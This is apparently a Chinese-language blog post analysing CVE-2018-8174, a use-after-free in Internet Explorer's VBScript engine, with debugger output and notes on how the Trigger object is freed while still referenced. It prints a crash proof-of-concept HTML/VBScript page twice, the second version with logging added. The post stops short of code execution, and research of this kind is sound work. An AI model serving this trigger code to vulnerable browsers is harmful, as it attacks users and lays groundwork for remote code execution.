[IE][VBS][UAF][CVE-2018-8174]
阿新 • • 發佈:2018-07-16
進入 finish eap 發生 current tcl set color spa
環境:Win7+IE9
斷點:
1. Crash POC
<html lang="en"> <body> <script language="vbscript"> Dim array_a Dim array_b(1) Class Trigger Private Sub Class_Terminate() Set array_b(0) = array_a(1) array_a(1) = 1 End Sub End Class Sub UAF ReDim array_a(1) Set array_a(1) = New TriggerErase array_a End Sub Sub TriggerVuln array_b(0) = 0 End Sub Sub StartExploit UAF TriggerVuln End Sub StartExploit </script> </body> </html>
C:\Program Files\Debugging Tools for Windows (x86)>gflags.exe /i iexplore.exe +h pa Current Registry Settings for iexplore.exe executableare: 02000000 hpa - Enable page heap
加log,進一步驗證猜測
<html lang="en"> <body> <script language="vbscript"> Dim array_a Dim array_b(1) Class Trigger Private Sub Class_Terminate() Set array_b(0) = array_a(1) array_a(1) = 1 IsEmpty(array_b) End Sub End Class Sub UAF ReDimarray_a(1) Set array_a(1) = New Trigger IsEmpty(array_a) Erase array_a IsEmpty("Erase Finish") End Sub Sub TriggerVuln array_b(0) = 0 End Sub Sub StartExploit UAF TriggerVuln End Sub StartExploit </script> </body> </html>
到這裏可以看到,array_a(1)已經指向Trigger對象,繼續調試。(調到這裏的時候windb hang住了,只好殺了重新調試,新的array_a 地址是 0x081affe8)
執行到第三個IsEmpty,這時候array_a和Trigger object 已經釋放,array_b中還保存著對Trigger object 的引用。
隨後 array_b(0) = 0訪問了被釋放的內存,從而觸發UAF 漏洞
顯然,當 array_b 還引用Trigger Object的時候,Trigger Object卻隨著 Erase array_a被釋放了。我們來看看是哪裏發生了錯誤。
看過偽代碼後,通過調試進一步驗證猜測
0:004> bl 0 e 6b1e343d 0001 (0001) 0:**** vbscript!VbsErase 1 e 6b1a5f1c 0001 (0001) 0:**** vbscript!VBScriptClass::Release 2 e 6b1a583e 0001 (0001) 0:**** vbscript!VbsIsEmpty
進入到 vbscript!VBScriptClass::Release 把上述斷點disable掉,否則單步調試會斷在我們不期望的地方
[IE][VBS][UAF][CVE-2018-8174]